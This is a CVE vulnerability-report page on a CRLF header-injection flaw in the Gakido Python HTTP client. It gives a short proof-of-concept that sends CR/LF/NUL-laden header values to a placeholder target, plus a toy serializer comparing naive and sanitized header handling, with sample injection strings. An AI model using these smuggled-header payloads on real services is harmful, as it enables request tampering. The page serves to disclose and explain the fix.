Security Vulnerability Report
CVE-2026-24489 CVSS 5.3 MEDIUM

Published: 2026-01-27 01:16:02
Last Modified: 2026-04-15 00:35:42

Description

Gakido is a Python HTTP client focused on browser impersonation and anti-bot evasion. A vulnerability was discovered in Gakido prior to version 0.1.1 that allowed HTTP header injection through CRLF (Carriage Return Line Feed) sequences in user-supplied header values and names. When making HTTP requests with user-controlled header values containing `\r\n` (CRLF), `\n` (LF), or `\x00` (null byte) characters, an attacker could inject arbitrary HTTP headers into the request. The fix in version 0.1.1 adds a `_sanitize_header()` function that strips `\r`, `\n`, and `\x00` characters from both header names and values before they are included in HTTP requests.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No CPE configuration data is present in the NVD record. The affected range stated in the advisory is:

Gakido < 0.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import gakido

# PoC for CVE-2026-24489 - HTTP Header Injection in Gakido
# Vulnerable versions: < 0.1.1
client = gakido.Client()

# Header values carrying CR/LF (and a NUL byte). In a vulnerable version these
# are written to the wire unchanged, so each embedded line break starts a new
# header field. '\x00\x0a\x0d' is NUL, LF, CR.
malicious_headers = {
    'User-Agent': 'Mozilla/5.0\r\nX-Injected-Header: malicious-value\r\nX-Injected-Header2: another-value',
    'X-Custom-Header': 'value1\x00\x0a\x0dmalicious',
}

try:
    # In vulnerable versions the injected headers reach the server.
    # (client.get / response.status_code are the PoC's assumption about the
    # gakido API; the advisory does not document the call surface.)
    response = client.get('http://target.example.com/', headers=malicious_headers)
    print(f"Status: {response.status_code}")
except Exception as e:
    print(f"Error: {e}")

# Fixed-version check. The advisory only names the function _sanitize_header();
# the gakido.utils import path is the PoC author's assumption, not confirmed
# by the advisory, so an ImportError can also mean the function lives elsewhere.
try:
    from gakido.utils import _sanitize_header

    # A fixed version should return the value with \r, \n and \x00 removed.
    sanitized = _sanitize_header(malicious_headers['User-Agent'])
    print(f"Sanitized header: {sanitized}")
    if any(c in sanitized for c in '\r\n\x00'):
        print("Control characters survived sanitization")
except ImportError:
    print("Vulnerable version - _sanitize_header not available (or located elsewhere)")
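The description and the PoC above both rely on the same mechanism: a header value that contains a line terminator is serialized as more than one header field. The following is an added, self-contained illustration, not gakido's code and not the page's PoC: a toy request serializer with the pre-0.1.1 behaviour the description gives, a strip-style sanitizer modelled on what the advisory says `_sanitize_header()` does, a reject-style variant as an alternative, and a lenient server-side parser that shows why a bare `\n` is enough to split a field. All header values, names and the host names are constructed sample inputs; function names are mine.

```python
import re
from typing import Callable, Dict, List, Tuple

# Characters the advisory says gakido 0.1.1 strips: CR, LF and NUL.
# CR/LF terminate a header line on the wire; NUL is removed because some
# parsers treat it as a string terminator, so hops could read the value differently.
CTL = re.compile(r"[\r\n\x00]")

# Constructed sample inputs (not from the advisory): values an application might
# forward from user input into an outgoing request header.
UA_WITH_CRLF = "Mozilla/5.0\r\nX-Injected: 1\r\nHost: evil.example"
VALUE_WITH_BARE_LF = "value1\nX-Lf-Injected: 1"
NAME_WITH_CRLF = "X-Custom\r\nX-Name-Injected"


def serialize_naive(method: str, path: str, host: str, headers: Dict[str, str]) -> str:
    """Toy serializer with the pre-0.1.1 behaviour: names and values go on the
    wire untouched, so embedded line breaks become new header fields."""
    lines = [f"{method} {path} HTTP/1.1", f"Host: {host}"]
    lines += [f"{name}: {value}" for name, value in headers.items()]
    return "\r\n".join(lines) + "\r\n\r\n"


def sanitize_strip(s: str) -> str:
    """Strip-style fix, modelled on the advisory's description of _sanitize_header()."""
    return CTL.sub("", s)


def sanitize_reject(s: str) -> str:
    """Reject-style alternative: fail loudly instead of silently rewriting the value."""
    if CTL.search(s):
        raise ValueError(f"control character in header field: {s!r}")
    return s


def serialize_fixed(method: str, path: str, host: str, headers: Dict[str, str],
                    sanitize: Callable[[str], str] = sanitize_strip) -> str:
    """Apply the sanitizer to both names and values before serializing."""
    clean = {sanitize(n): sanitize(v) for n, v in headers.items()}
    return serialize_naive(method, path, host, clean)


def parse_as_lenient_server(raw: str) -> List[Tuple[str, str]]:
    """Parse the header block the way a lenient server does: CRLF and bare LF
    both end a line, which is why a lone LF already splits a header."""
    head = raw.split("\r\n\r\n", 1)[0]
    fields = []
    for line in re.split(r"\r?\n", head)[1:]:  # skip the request line
        if line:
            name, _, value = line.partition(":")
            fields.append((name.strip(), value.strip()))
    return fields


def header_names(raw: str) -> List[str]:
    """Field names a lenient server would see in the serialized request."""
    return [name for name, _ in parse_as_lenient_server(raw)]


def rejected(headers: Dict[str, str]) -> bool:
    """True if the reject-style sanitizer refuses any name or value in headers."""
    try:
        serialize_fixed("GET", "/", "h", headers, sanitize=sanitize_reject)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    hdrs = {"User-Agent": UA_WITH_CRLF}
    print("vulnerable:", header_names(serialize_naive("GET", "/", "target.example", hdrs)))
    print("stripped:  ", header_names(serialize_fixed("GET", "/", "target.example", hdrs)))
    print("rejected:  ", rejected(hdrs))
```

The strip variant reproduces the advisory's fix: the injected text survives as part of the original value, but on a single line, so no extra field is created. The reject variant is what you want when the header value is not supposed to contain control characters at all, because silently rewriting can hide an attack from logs and from the caller.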

References

https://github.com/HappyHackingSpace/gakido/security/advisories/GHSA-gcgx-chcp-hxp9 (GitHub security advisory)
https://github.com/HappyHackingSpace/gakido/commit/369c67e67c63da510c8a9ab021e54a92ccf1f788 (commit referenced by the NVD record)
https://github.com/HappyHackingSpace/gakido/releases/tag/v0.1.1-1bc6019 (release tag v0.1.1)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24489", "sourceIdentifier": "[email protected]", "published": "2026-01-27T01:16:02.453", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Gakido is a Python HTTP client focused on browser impersonation and anti-bot evasion. A vulnerability was discovered in Gakido prior to version 0.1.1 that allowed HTTP header injection through CRLF (Carriage Return Line Feed) sequences in user-supplied header values and names. When making HTTP requests with user-controlled header values containing `\\r\\n` (CRLF), `\\n` (LF), or `\\x00` (null byte) characters, an attacker could inject arbitrary HTTP headers into the request. The fix in version 0.1.1 adds a `_sanitize_header()` function that strips `\\r`, `\\n`, and `\\x00` characters from both header names and values before they are included in HTTP requests."}, {"lang": "es", "value": "Gakido es un cliente HTTP de Python centrado en la suplantación de navegadores y la evasión de bots. Se descubrió una vulnerabilidad en Gakido anterior a la versión 0.1.1 que permitía la inyección de encabezados HTTP a través de secuencias CRLF (retorno de carro y salto de línea) en los valores y nombres de los encabezados proporcionados por el usuario. Al realizar solicitudes HTTP con valores de encabezado controlados por el usuario que contienen caracteres `\\r\\n` (CRLF), `\\n` (LF) o `\\x00` (byte nulo), un atacante podía inyectar encabezados HTTP arbitrarios en la solicitud. La corrección en la versión 0.1.1 añade una función `_sanitize_header()` que elimina los caracteres `\\r`, `\\n` y `\\x00` tanto de los nombres como de los valores de los encabezados antes de que se incluyan en las solicitudes HTTP."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-93"}, {"lang": "en", "value": "CWE-113"}]}], "references": [{"url": "https://github.com/HappyHackingSpace/gakido/commit/369c67e67c63da510c8a9ab021e54a92ccf1f788", "source": "[email protected]"}, {"url": "https://github.com/HappyHackingSpace/gakido/releases/tag/v0.1.1-1bc6019", "source": "[email protected]"}, {"url": "https://github.com/HappyHackingSpace/gakido/security/advisories/GHSA-gcgx-chcp-hxp9", "source": "[email protected]"}]}}